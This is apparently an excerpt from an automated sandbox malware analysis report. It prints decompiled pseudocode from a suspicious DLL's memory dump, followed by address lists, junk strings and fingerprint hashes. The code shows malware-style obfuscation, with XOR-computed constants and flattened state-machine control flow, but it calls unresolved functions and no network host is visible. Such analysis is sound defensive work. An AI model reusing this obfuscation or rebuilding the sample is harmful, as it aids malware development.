				_t527 = 0x12;
				_v1640 = _v1640 / _t526;
				_v1640 = _v1640 ^ 0x0e263cba;
				_v1708 = 0xa848;
				_v1708 = _v1708 << 2;
				_v1708 = _v1708 + 0xffff4f47;
				_v1708 = _v1708 >> 0x10;
				_v1708 = _v1708 ^ 0x00004df5;
				_v1716 = 0x3304;
				_v1716 = _v1716 ^ 0x61e3d3e4;
				_v1716 = _v1716 + 0x5bdd;
				_v1716 = _v1716 + 0xffffa59f;
				_v1716 = _v1716 ^ 0x61e3ceb5;
				_v1648 = 0x6dc4;
				_v1648 = _v1648 | 0x8611d38f;
				_v1648 = _v1648 << 8;
				_v1648 = _v1648 ^ 0x11ffcc6f;
				_v1656 = 0x328f;
				_v1656 = _v1656 * 0x7c;
				_v1656 = _v1656 + 0xeaba;
				_v1656 = _v1656 ^ 0x00191fbe;
				_v1632 = 0x61f7;
				_v1632 = _v1632 / _t527;
				_t528 = 0x58;
				_v1632 = _v1632 / _t528;
				_v1632 = _v1632 ^ 0x00002538;
				_v1692 = 0x1be6;
				_v1692 = _v1692 | 0x9feafdcd;
				_v1692 = _v1692 << 2;
				_v1692 = _v1692 | 0x8d482522;
				_v1692 = _v1692 ^ 0xffebf3eb;
				_v1700 = 0x9b1b;
				_t529 = 0x31;
				_t516 = _v1576;
				_v1700 = _v1700 / _t529;
				_v1700 = _v1700 * 0x73;
				_v1700 = _v1700 << 0xe;
				_v1700 = _v1700 ^ 0x5af7f17e;
				_v1724 = 0xca47;
				_v1724 = _v1724 << 0xd;
				_v1724 = _v1724 >> 5;
				_v1724 = _v1724 + 0xd0a1;
				_v1724 = _v1724 ^ 0x00cb17a0;
				while(1) {
					L1:
					_t530 = 0x5c;
					while(1) {
						L2:
						_t493 = 0x6df7a4c;
						do {
							L3:
							if(_t581 == _t493) {
								_t495 = E1001BBAB(_v1664, _v1732,  &_v1560, _v1604);
								_pop(_t533);
								_t497 = E1001EC06(_v1640,  &_v1560, _v1708, _t516, _v1572, _t533, _v1716, _v1648, 2 + _t495 * 2, _v1724, _v1656);
								_t586 =  &(_t586[9]);
								__eflags = _t497;
								_t581 = 0x2a46bc81;
								_t448 = _t497 == 0;
								__eflags = _t448;
								_v1576 = 0 | _t448;
								goto L17;
							} else {
								if(_t581 == 0xbbbecbf) {
									_t518 =  *0x100221b0 + 0x10;
									while(1) {
										__eflags =  *_t518 - _t530;
										if(__eflags == 0) {
											break;
										}
										_t518 = _t518 + 2;
										__eflags = _t518;
									}
									_t516 = _t518 + 2;
									_t581 = 0x2529a265;
									goto L2;
								} else {
									if(_t581 == 0x2529a265) {
										_push(0x10001080);
										_push(_v1764);
										_t499 = E1001BF25(_v1668, _v1584, __eflags);
										_pop(_t539);
										_t425 =  &_v1624; // 0xe6615551
										__eflags = E10013659(_v1688, _v1748, _v1620,  *_t425, _v1580, _t539,  &_v1572, _v1660, _t539, _t539, _t499, _t539, _v1756, _v1636);
										_t581 =  ==  ? 0x6df7a4c : 0x1cdd012f;
										E1001C5F7(_v1672, _v1680, _v1740, _v1612, _t499);
										_t586 =  &(_t586[0x10]);
										L17:
										_t493 = 0x6df7a4c;
										_t530 = 0x5c;
										goto L18;
									} else {
										if(_t581 == 0x2a46bc81) {
											E10015483(_v1632, _v1692, _v1700, _v1572);
										} else {
											if(_t581 == 0x2a61740b) {
												_push(0x10001020);
												_push(_v1596);
												_t505 = E1001BF25(_v1752, _v1644, __eflags);
												E100173C0( &_v1040, __eflags);
												E10003482(_v1600, __eflags,  &_v520,  &_v1560, _v1744, _v1592,  &_v1040,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t505, _v1720, _v1676, _v1608);
												E1001C5F7(_v1728, _v1712, _v1736, _v1704, _t505);
												_t586 =  &(_t586[0x11]);
												_t581 = 0xbbbecbf;
												goto L1;
											} else {
												if(_t581 != 0x3875c21b) {
													goto L18;
												} else {
													_push(_t530);
													E10001D54(_v1684, _t530, _v1628, _v1696, _v1760,  &_v520, _v1588, _v1616);
													_t586 =  &(_t586[8]);
													_t581 = 0x2a61740b;
													while(1) {
														L1:
														_t530 = 0x5c;
														L2:
														_t493 = 0x6df7a4c;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L21:
							return _v1576;
							L18:
							__eflags = _t581 - 0x1cdd012f;
						} while (__eflags != 0);
						goto L21;
					}
				}
			}

0x1001f411
0x1001f417
0x1001f424
0x1001f42d
0x1001f438
0x1001f440
0x1001f44b
0x1001f456
0x1001f45e
0x1001f469
0x1001f474
0x1001f47c
0x1001f484
0x1001f48d
0x1001f494
0x1001f49f
0x1001f4a4
0x1001f4aa
0x1001f4b2
0x1001f4bf
0x1001f4c2
0x1001f4cb
0x1001f4cf
0x1001f4d7
0x1001f4ea
0x1001f4f1
0x1001f4fc
0x1001f504
0x1001f509
0x1001f50e
0x1001f512
0x1001f51a
0x1001f527
0x1001f52b
0x1001f538
0x1001f53c
0x1001f544
0x1001f556
0x1001f55b
0x1001f564
0x1001f56f
0x1001f577
0x1001f57c
0x1001f581
0x1001f589
0x1001f591
0x1001f5a3
0x1001f5a6
0x1001f5ad
0x1001f5b8
0x1001f5c3
0x1001f5ce
0x1001f5d9
0x1001f5e4
0x1001f5ef
0x1001f5f7
0x1001f5ff
0x1001f60a
0x1001f620
0x1001f625
0x1001f62e
0x1001f639
0x1001f646
0x1001f649
0x1001f652
0x1001f65b
0x1001f65f
0x1001f667
0x1001f672
0x1001f67a
0x1001f685
0x1001f68d
0x1001f695
0x1001f699
0x1001f6a1
0x1001f6a9
0x1001f6b1
0x1001f6b9
0x1001f6be
0x1001f6c6
0x1001f6d1
0x1001f6dc
0x1001f6e7
0x1001f6f4
0x1001f6fd
0x1001f701
0x1001f706
0x1001f70e
0x1001f71e
0x1001f727
0x1001f728
0x1001f72c
0x1001f734
0x1001f73c
0x1001f744
0x1001f74c
0x1001f751
0x1001f759
0x1001f761
0x1001f769
0x1001f76e
0x1001f772
0x1001f77a
0x1001f782
0x1001f78a
0x1001f792
0x1001f797
0x1001f79b
0x1001f7a3
0x1001f7ab
0x1001f7b6
0x1001f7c1
0x1001f7cc
0x1001f7d4
0x1001f7e2
0x1001f7e6
0x1001f7eb
0x1001f7f3
0x1001f7fb
0x1001f803
0x1001f808
0x1001f812
0x1001f81a
0x1001f81f
0x1001f827
0x1001f82f
0x1001f837
0x1001f842
0x1001f84d
0x1001f858
0x1001f863
0x1001f86a
0x1001f875
0x1001f880
0x1001f88b
0x1001f896
0x1001f89e
0x1001f8a3
0x1001f8ab
0x1001f8b3
0x1001f8bb
0x1001f8c3
0x1001f8cb
0x1001f8d3
0x1001f8db
0x1001f8e3
0x1001f8eb
0x1001f8f3
0x1001f8fb
0x1001f903
0x1001f90b
0x1001f913
0x1001f91b
0x1001f926
0x1001f92e
0x1001f939
0x1001f941
0x1001f949
0x1001f951
0x1001f959
0x1001f961
0x1001f966
0x1001f975
0x1001f978
0x1001f97c
0x1001f984
0x1001f98f
0x1001f997
0x1001f9a2
0x1001f9ad
0x1001f9c1
0x1001f9c2
0x1001f9c9
0x1001f9d4
0x1001f9dc
0x1001f9e1
0x1001f9e9
0x1001f9ee
0x1001f9f6
0x1001f9fe
0x1001fa06
0x1001fa0e
0x1001fa16
0x1001fa1e
0x1001fa29
0x1001fa34
0x1001fa3c
0x1001fa47
0x1001fa54
0x1001fa58
0x1001fa60
0x1001fa6a
0x1001fa80
0x1001fa95
0x1001fa9a
0x1001faa3
0x1001faae
0x1001fab6
0x1001fabe
0x1001fac3
0x1001facb
0x1001fad3
0x1001fadf
0x1001fae2
0x1001fae9
0x1001faf2
0x1001faf6
0x1001fafb
0x1001fb03
0x1001fb0b
0x1001fb10
0x1001fb15
0x1001fb1d
0x1001fb25
0x1001fb25
0x1001fb27
0x1001fb28
0x1001fb28
0x1001fb28
0x1001fb2d
0x1001fb2d
0x1001fb2f
0x1001fd1d
0x1001fd23
0x1001fd5a
0x1001fd61
0x1001fd64
0x1001fd66
0x1001fd6b
0x1001fd6b
0x1001fd6e
0x00000000
0x1001fb35
0x1001fb3b
0x1001fcef
0x1001fcf7
0x1001fcf7
0x1001fcfa
0x00000000
0x00000000
0x1001fcf4
0x1001fcf4
0x1001fcf4
0x1001fcfc
0x1001fcff
0x00000000
0x1001fb41
0x1001fb43
0x1001fc52
0x1001fc57
0x1001fc66
0x1001fc6c
0x1001fc95
0x1001fcbb
0x1001fcd9
0x1001fcdc
0x1001fce1
0x1001fd75
0x1001fd77
0x1001fd7c
0x00000000
0x1001fb49
0x1001fb4f
0x1001fda1
0x1001fb55
0x1001fb5b
0x1001fba3
0x1001fba8
0x1001fbba
0x1001fbc8
0x1001fc24
0x1001fc40
0x1001fc45
0x1001fc48
0x00000000
0x1001fb5d
0x1001fb63
0x00000000
0x1001fb69
0x1001fb69
0x1001fb94
0x1001fb99
0x1001fb9c
0x1001fb25
0x1001fb25
0x1001fb27
0x1001fb28
0x1001fb28
0x00000000
0x1001fb28
0x1001fb25
0x1001fb63
0x1001fb5b
0x1001fb4f
0x1001fb43
0x1001fb3b
0x1001fda8
0x1001fdb9
0x1001fd7d
0x1001fd7d
0x1001fd7d
0x00000000
0x1001fd89
0x1001fb28

Strings

utf4, xrefs: 1001F6BE
n9, xrefs: 1001F4D7
s, xrefs: 1001F72C
|, xrefs: 1001F6C6
MDu, xrefs: 1001F769
QUa, xrefs: 1001FC95
Rmutf4, xrefs: 1001F792
K, xrefs: 1001F7CC
R, xrefs: 1001F997
jC, xrefs: 1001F8D3
1{, xrefs: 1001F42D
Bp, xrefs: 1001F62E
AY, xrefs: 1001F7FB
Z7, xrefs: 1001F9A2
u, xrefs: 1001F70E
8%, xrefs: 1001FAA3

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: s$1{$8%$AY$Bp$K$MDu$QUa$Rmutf4$Z7$jC$n9$utf4$u$R$|
API String ID: 0-2491655032
Opcode ID: 4044c3afec894246fee1f662e1da1731f593b194fe46b34393316257da5b73b0
Instruction ID: bb0f35014981fe5b56090f270f76ab9b3438ccc7679621ff333ea9736163f667
Opcode Fuzzy Hash: 4044c3afec894246fee1f662e1da1731f593b194fe46b34393316257da5b73b0
Instruction Fuzzy Hash: 6B32D37150C3809FE369CF25C98AA9FBBE2FBC5354F10891DE19A862A0D7B59549CF03

Uniqueness

Uniqueness Score: -1.00%

Function 1000F813, Relevance: 20.4, Strings: 16, Instructions: 429
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000F813() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				unsigned int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				intOrPtr* _t473;
				void* _t479;
				intOrPtr* _t489;
				void* _t491;
				void* _t522;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				intOrPtr _t540;
				intOrPtr* _t542;
				intOrPtr* _t543;
				signed int* _t547;
				void* _t550;

				_t547 =  &_v1772;
				_v1564 = 0xa43e;
				_v1564 = _v1564 ^ 0x45b26b29;
				_t491 = 0x29fd4c8c;
				_v1564 = _v1564 ^ 0x45b2cf3e;
				_v1604 = 0xd832;
				_v1604 = _v1604 << 7;
				_v1604 = _v1604 ^ 0x006c754a;
				_v1676 = 0xea82;
				_v1676 = _v1676 | 0xeffbbfdd;
				_v1676 = _v1676 ^ 0xeffbe896;
				_v1744 = 0x2481;
				_v1744 = _v1744 << 6;
				_v1744 = _v1744 + 0x9ec7;
				_v1744 = _v1744 + 0x8a8;
				_v1744 = _v1744 ^ 0x0009f1d1;
				_v1580 = 0x9f5;
				_v1580 = _v1580 | 0x253f9e02;
				_v1580 = _v1580 ^ 0x253fa85d;
				_v1612 = 0xe62c;
				_v1612 = _v1612 ^ 0xf7e1e6dc;
				_v1612 = _v1612 ^ 0xf7e121db;
				_v1644 = 0xa597;
				_v1644 = _v1644 << 3;
				_v1644 = _v1644 ^ 0x00057224;
				_v1636 = 0x74cb;
				_v1636 = _v1636 | 0x8dfb5c1d;
				_v1636 = _v1636 ^ 0x8dfb1908;
				_v1672 = 0xf927;
				_t530 = 0x47;
				_v1672 = _v1672 / _t530;
				_v1672 = _v1672 << 8;
				_t543 = 0;
				_v1672 = _v1672 ^ 0x0003eef2;
				_v1684 = 0xe8df;
				_v1684 = _v1684 ^ 0xe48f8edf;
				_t531 = 0x4b;
				_v1576 = 0;
				_v1684 = _v1684 * 0xe;
				_v1684 = _v1684 ^ 0x7fd7efbf;
				_v1572 = 0xd38b;
				_v1572 = _v1572 | 0x212f5c39;
				_v1572 = _v1572 ^ 0x212fa689;
				_v1652 = 0x1200;
				_v1652 = _v1652 / _t531;
				_v1652 = _v1652 ^ 0x00000a2b;
				_v1596 = 0x13dd;
				_v1596 = _v1596 | 0xceb868f3;
				_v1596 = _v1596 ^ 0xceb84d66;
				_v1768 = 0x3bb1;
				_v1768 = _v1768 + 0xffff0d17;
				_v1768 = _v1768 >> 7;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x0007e300;
				_v1716 = 0xf0d2;
				_v1716 = _v1716 + 0xe075;
				_v1716 = _v1716 ^ 0x9b47385c;
				_v1716 = _v1716 ^ 0x9b46cdd4;
				_v1660 = 0x69dd;
				_v1660 = _v1660 | 0x8bdea621;
				_v1660 = _v1660 << 0x10;
				_v1660 = _v1660 ^ 0xeffd1439;
				_v1760 = 0x4063;
				_v1760 = _v1760 << 6;
				_v1760 = _v1760 * 0x7c;
				_v1760 = _v1760 ^ 0xd256c198;
				_v1760 = _v1760 ^ 0xd59d1bc0;
				_v1628 = 0x90dd;
				_v1628 = _v1628 + 0xffff497e;
				_v1628 = _v1628 ^ 0xffffd705;
				_v1736 = 0xfcae;
				_t532 = 0x46;
				_v1736 = _v1736 / _t532;
				_v1736 = _v1736 + 0xcadb;
				_v1736 = _v1736 ^ 0x517b85fd;
				_v1736 = _v1736 ^ 0x517b3d77;
				_v1708 = 0xaa4c;
				_t533 = 0xd;
				_v1708 = _v1708 * 0x56;
				_v1708 = _v1708 | 0x843164d5;
				_v1708 = _v1708 ^ 0x84391434;
				_v1688 = 0x7b92;
				_v1688 = _v1688 + 0x23d3;
				_v1688 = _v1688 | 0xa0cceb2c;
				_v1688 = _v1688 ^ 0xa0ccf5a5;
				_v1696 = 0x2f42;
				_v1696 = _v1696 + 0xffffada6;
				_v1696 = _v1696 + 0xffffd11c;
				_v1696 = _v1696 ^ 0xffff8010;
				_v1704 = 0x664;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 << 4;
				_v1704 = _v1704 ^ 0x001991ab;
				_v1600 = 0x17c3;
				_v1600 = _v1600 * 0x6e;
				_v1600 = _v1600 ^ 0x000a4796;
				_v1756 = 0x876e;
				_v1756 = _v1756 ^ 0xccadfb01;
				_v1756 = _v1756 / _t533;
				_v1756 = _v1756 | 0x71b05a4c;
				_v1756 = _v1756 ^ 0x7fbe83ae;
				_v1608 = 0xc50f;
				_t534 = 0x7e;
				_v1608 = _v1608 / _t534;
				_v1608 = _v1608 ^ 0x00000e7d;
				_v1712 = 0xe559;
				_v1712 = _v1712 | 0xff7f7fff;
				_v1712 = _v1712 ^ 0xff7fd517;
				_v1720 = 0x1170;
				_v1720 = _v1720 * 0x2e;
				_v1720 = _v1720 | 0xa70aa585;
				_v1720 = _v1720 ^ 0xa70bab82;
				_v1724 = 0x666c;
				_v1724 = _v1724 | 0x8fee4b7f;
				_v1724 = _v1724 ^ 0x8fee281e;
				_v1772 = 0xf606;
				_v1772 = _v1772 ^ 0x11a63a32;
				_v1772 = _v1772 >> 1;
				_v1772 = _v1772 | 0xbd41a285;
				_v1772 = _v1772 ^ 0xbdd3c841;
				_v1624 = 0xc87;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0x000cb845;
				_v1632 = 0xcf71;
				_v1632 = _v1632 + 0x859a;
				_v1632 = _v1632 ^ 0x000172a0;
				_v1640 = 0x9b4e;
				_v1640 = _v1640 + 0xfffffeb0;
				_v1640 = _v1640 ^ 0x0000b068;
				_v1752 = 0x51f0;
				_v1752 = _v1752 << 0xd;
				_v1752 = _v1752 * 9;
				_v1752 = _v1752 ^ 0xa73676e0;
				_v1752 = _v1752 ^ 0xfb182fbc;
				_v1568 = 0x8b8;
				_v1568 = _v1568 | 0x4447cdf9;
				_v1568 = _v1568 ^ 0x4447aa39;
				_v1732 = 0xaa2a;
				_t535 = 0x4c;
				_v1732 = _v1732 / _t535;
				_v1732 = _v1732 >> 7;
				_v1732 = _v1732 | 0x5d199c15;
				_v1732 = _v1732 ^ 0x5d19ea5e;
				_v1740 = 0x9be5;
				_v1740 = _v1740 ^ 0x27ebeb7e;
				_v1740 = _v1740 >> 6;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xfadc41bb;
				_v1748 = 0xab1f;
				_v1748 = _v1748 >> 0xd;
				_v1748 = _v1748 | 0x2e03c9c9;
				_t536 = 0x78;
				_v1748 = _v1748 * 0x61;
				_v1748 = _v1748 ^ 0x6f6f6458;
				_v1680 = 0x432d;
				_v1680 = _v1680 << 9;
				_v1680 = _v1680 + 0xaa9a;
				_v1680 = _v1680 ^ 0x008720ae;
				_v1620 = 0xb695;
				_v1620 = _v1620 | 0x9c0d8b30;
				_v1620 = _v1620 ^ 0x9c0dd91b;
				_v1700 = 0x7cda;
				_v1700 = _v1700 / _t536;
				_v1700 = _v1700 << 5;
				_v1700 = _v1700 ^ 0x00004203;
				_v1668 = 0xca1;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 + 0xfb4a;
				_v1668 = _v1668 ^ 0x00041992;
				_v1588 = 0x2832;
				_v1588 = _v1588 + 0xffff4b77;
				_v1588 = _v1588 ^ 0xffff7d0e;
				_v1584 = 0xd717;
				_v1584 = _v1584 + 0x8534;
				_v1584 = _v1584 ^ 0x00011bb2;
				_v1656 = 0x6f3e;
				_v1656 = _v1656 >> 0xc;
				_t537 = 0x2b;
				_v1656 = _v1656 / _t537;
				_v1656 = _v1656 ^ 0x00003e2a;
				_v1664 = 0x8f26;
				_v1664 = _v1664 >> 6;
				_v1664 = _v1664 << 2;
				_v1664 = _v1664 ^ 0x0000651c;
				_v1728 = 0xe7d3;
				_v1728 = _v1728 << 0xd;
				_t538 = 0x2a;
				_v1728 = _v1728 / _t538;
				_v1728 = _v1728 ^ 0x00b0dbe1;
				_v1592 = 0xd2ea;
				_t539 = 0x52;
				_v1592 = _v1592 / _t539;
				_v1592 = _v1592 ^ 0x000f02ad;
				_v1692 = 0x3985;
				_t546 = _v1576;
				_t490 = _v1576;
				_t540 = _v1576;
				_v1692 = _v1692 * 0x1b;
				_v1692 = _v1692 ^ 0x0e34e665;
				_v1692 = _v1692 ^ 0x0e32f760;
				_v1616 = 0x5c84;
				_v1616 = _v1616 >> 0xd;
				_v1764 = 0x6db6;
				_v1764 = _v1764 << 9;
				_v1764 = _v1764 + 0xffff9705;
				_v1764 = _v1764 | 0x2711d9d9;
				_v1764 = _v1764 ^ 0x27dbdbdd;
				_v1648 = 0x109c;
				_v1648 = _v1648 + 0x526d;
				_v1648 = _v1648 ^ 0x00006319;
				while(1) {
					L1:
					_t522 = 0x5c;
					do {
						while(1) {
							L2:
							_t550 = _t491 - 0x29fd4c8c;
							if(_t550 > 0) {
								break;
							}
							if(_t550 == 0) {
								_push(_t491);
								E10001D54(_v1604, _t491, _v1676, _v1744, _v1580,  &_v1040, _v1612, _v1564);
								_t547 =  &(_t547[8]);
								_t491 = 0x1e06f250;
								while(1) {
									L1:
									_t522 = 0x5c;
									goto L2;
								}
							} else {
								if(_t491 == 0x2d4cd3b) {
									_t542 =  *0x100221b0 + 0x10;
									while(1) {
										__eflags =  *_t542 - _t522;
										if(__eflags == 0) {
											break;
										}
										_t542 = _t542 + 2;
										__eflags = _t542;
									}
									_t540 = _t542 + 2;
									_t491 = 0x2f9aa500;
									continue;
								} else {
									if(_t491 == 0x10ed6b66) {
										E1001F23C(_v1584, _t490, _v1656, _v1664, _v1728);
									} else {
										if(_t491 == 0x140b5383) {
											E1001F23C(_v1620, _t546, _v1700, _v1668, _v1588);
											_t547 =  &(_t547[3]);
											L10:
											_t491 = 0x10ed6b66;
											while(1) {
												L1:
												_t522 = 0x5c;
												goto L2;
											}
										} else {
											_t554 = _t491 - 0x1e06f250;
											if(_t491 != 0x1e06f250) {
												goto L24;
											} else {
												_push(0x10001020);
												_push(_v1672);
												_t479 = E1001BF25(_v1644, _v1636, _t554);
												E100173C0( &_v1560, _t554);
												E10003482(_v1572, _t554,  &_v1040,  &_v520, _v1652, _v1596,  &_v1560,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t479, _v1768, _v1716, _v1660);
												E1001C5F7(_v1760, _v1628, _v1736, _v1708, _t479);
												_t543 = _v1576;
												_t547 =  &(_t547[0x11]);
												_t491 = 0x2d4cd3b;
												while(1) {
													L1:
													_t522 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L27:
							return _t543;
						}
						__eflags = _t491 - 0x2a58a6fb;
						if(_t491 == 0x2a58a6fb) {
							E1000620A(_v1732, _v1740, _v1748, _v1680, _t490, _t546);
							_t547 =  &(_t547[4]);
							_t491 = 0x140b5383;
							_t522 = 0x5c;
							goto L24;
						} else {
							__eflags = _t491 - 0x2f9aa500;
							if(_t491 == 0x2f9aa500) {
								_t473 = E1000DA66(_v1592, _t522, _v1688, _t491, _v1696);
								_t490 = _t473;
								_t547 =  &(_t547[3]);
								__eflags = _t473;
								if(__eflags != 0) {
									_t491 = 0x38e9bb98;
									goto L1;
								}
							} else {
								__eflags = _t491 - 0x38e9bb98;
								if(_t491 != 0x38e9bb98) {
									goto L24;
								} else {
									_t489 = E1000BE98(_v1704, _t522, _v1600, _v1756, _v1608, _v1712, _t490, _v1720, _v1616, _v1764, _t540, _v1724, _t491, _v1772, _t491, _t491, _v1624, _t491, _v1632, _v1692,  &_v520, _t540, _v1640, _v1648, _v1752, _v1568);
									_t546 = _t489;
									_t547 =  &(_t547[0x18]);
									__eflags = _t489;
									if(__eflags == 0) {
										goto L10;
									} else {
										_t491 = 0x2a58a6fb;
										_t543 = 1;
										_v1576 = 1;
										while(1) {
											L1:
											_t522 = 0x5c;
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t491 - 0x19ee210;
					} while (__eflags != 0);
					goto L27;
				}
			}

0x1000f813
0x1000f81d
0x1000f82a
0x1000f835
0x1000f83a
0x1000f845
0x1000f850
0x1000f858
0x1000f863
0x1000f86b
0x1000f873
0x1000f87b
0x1000f883
0x1000f888
0x1000f890
0x1000f898
0x1000f8a0
0x1000f8ab
0x1000f8b6
0x1000f8c1
0x1000f8cc
0x1000f8d7
0x1000f8e2
0x1000f8ed
0x1000f8f5
0x1000f900
0x1000f90b
0x1000f916
0x1000f921
0x1000f92f
0x1000f934
0x1000f93a
0x1000f93f
0x1000f941
0x1000f949
0x1000f951
0x1000f95e
0x1000f95f
0x1000f966
0x1000f96a
0x1000f972
0x1000f97d
0x1000f988
0x1000f993
0x1000f9a7
0x1000f9ae
0x1000f9b9
0x1000f9c4
0x1000f9cf
0x1000f9da
0x1000f9e2
0x1000f9ea
0x1000f9ef
0x1000f9f4
0x1000f9fc
0x1000fa04
0x1000fa0c
0x1000fa14
0x1000fa1c
0x1000fa27
0x1000fa32
0x1000fa3a
0x1000fa45
0x1000fa4d
0x1000fa57
0x1000fa5b
0x1000fa63
0x1000fa6b
0x1000fa76
0x1000fa83
0x1000fa8e
0x1000fa9c
0x1000faa1
0x1000faa7
0x1000faaf
0x1000fab7
0x1000fabf
0x1000facc
0x1000facf
0x1000fad3
0x1000fadb
0x1000fae3
0x1000faeb
0x1000faf3
0x1000fafb
0x1000fb03
0x1000fb0b
0x1000fb13
0x1000fb1b
0x1000fb23
0x1000fb2b
0x1000fb30
0x1000fb35
0x1000fb3d
0x1000fb50
0x1000fb57
0x1000fb62
0x1000fb6a
0x1000fb7a
0x1000fb7e
0x1000fb86
0x1000fb8e
0x1000fba0
0x1000fba3
0x1000fbaa
0x1000fbb5
0x1000fbbd
0x1000fbc5
0x1000fbcd
0x1000fbda
0x1000fbde
0x1000fbe6
0x1000fbee
0x1000fbf6
0x1000fbfe
0x1000fc06
0x1000fc0e
0x1000fc16
0x1000fc1a
0x1000fc22
0x1000fc2a
0x1000fc35
0x1000fc3d
0x1000fc48
0x1000fc53
0x1000fc5e
0x1000fc69
0x1000fc74
0x1000fc7f
0x1000fc8a
0x1000fc92
0x1000fc9c
0x1000fca0
0x1000fca8
0x1000fcb2
0x1000fcbd
0x1000fcc8
0x1000fcd3
0x1000fce1
0x1000fce6
0x1000fcec
0x1000fcf1
0x1000fcf9
0x1000fd01
0x1000fd09
0x1000fd11
0x1000fd16
0x1000fd1b
0x1000fd23
0x1000fd2b
0x1000fd30
0x1000fd3d
0x1000fd40
0x1000fd44
0x1000fd4c
0x1000fd54
0x1000fd59
0x1000fd61
0x1000fd69
0x1000fd74
0x1000fd7f
0x1000fd8a
0x1000fd9a
0x1000fd9e
0x1000fda3
0x1000fdab
0x1000fdb3
0x1000fdb8
0x1000fdc0
0x1000fdc8
0x1000fdd3
0x1000fdde
0x1000fde9
0x1000fdf4
0x1000fdff
0x1000fe0a
0x1000fe15
0x1000fe24
0x1000fe29
0x1000fe32
0x1000fe3d
0x1000fe48
0x1000fe50
0x1000fe58
0x1000fe63
0x1000fe6b
0x1000fe74
0x1000fe79
0x1000fe7f
0x1000fe87
0x1000fe99
0x1000fe9c
0x1000fea3
0x1000feae
0x1000febb
0x1000fec2
0x1000fec9
0x1000fed0
0x1000fed4
0x1000fedc
0x1000fee4
0x1000feef
0x1000ff05
0x1000ff0d
0x1000ff12
0x1000ff1a
0x1000ff22
0x1000ff2a
0x1000ff35
0x1000ff40
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x1000ff4e
0x1000ff4e
0x1000ff4e
0x1000ff4e
0x1000ff54
0x00000000
0x00000000
0x1000ff5a
0x10010093
0x100100c4
0x100100c9
0x100100cc
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff60
0x1000ff66
0x10010079
0x10010081
0x10010081
0x10010084
0x00000000
0x00000000
0x1001007e
0x1001007e
0x1001007e
0x10010086
0x10010089
0x00000000
0x1000ff6c
0x1000ff72
0x10010207
0x1000ff78
0x1000ff7e
0x10010061
0x10010066
0x10010069
0x10010069
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff84
0x1000ff84
0x1000ff8a
0x00000000
0x1000ff90
0x1000ff90
0x1000ff95
0x1000ffa7
0x1000ffb5
0x10010014
0x10010030
0x10010035
0x1001003c
0x1001003f
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff4b
0x1000ff8a
0x1000ff7e
0x1000ff72
0x1000ff66
0x10010210
0x1001021b
0x1001021b
0x100100d6
0x100100dc
0x100101ce
0x100101d3
0x100101d6
0x100101dd
0x00000000
0x100100e2
0x100100e2
0x100100e8
0x100101a4
0x100101a9
0x100101ab
0x100101ae
0x100101b0
0x100101b2
0x00000000
0x100101b2
0x100100ee
0x100100ee
0x100100f4
0x00000000
0x100100fa
0x1001016e
0x10010173
0x10010175
0x10010178
0x1001017a
0x00000000
0x10010180
0x10010182
0x10010187
0x10010188
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff4b
0x1001017a
0x100100f4
0x100100e8
0x00000000
0x100101de
0x100101de
0x100101de
0x00000000
0x100101ea

Strings

u, xrefs: 1000FA04
Xdoo, xrefs: 1000FD38
9\/!, xrefs: 1000F97D
-C, xrefs: 1000FD4C
~', xrefs: 1000FD09
Jul, xrefs: 1000F858
lf, xrefs: 1000FBEE
*>, xrefs: 1000FE32
Xdoo, xrefs: 1000FD44
B/, xrefs: 1000FB03
Y, xrefs: 1000FBB5
mR, xrefs: 1000FF35
w={Q, xrefs: 1000FAB7
2(, xrefs: 1000FDC8
c@, xrefs: 1000FA45
,, xrefs: 1000F8C1

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

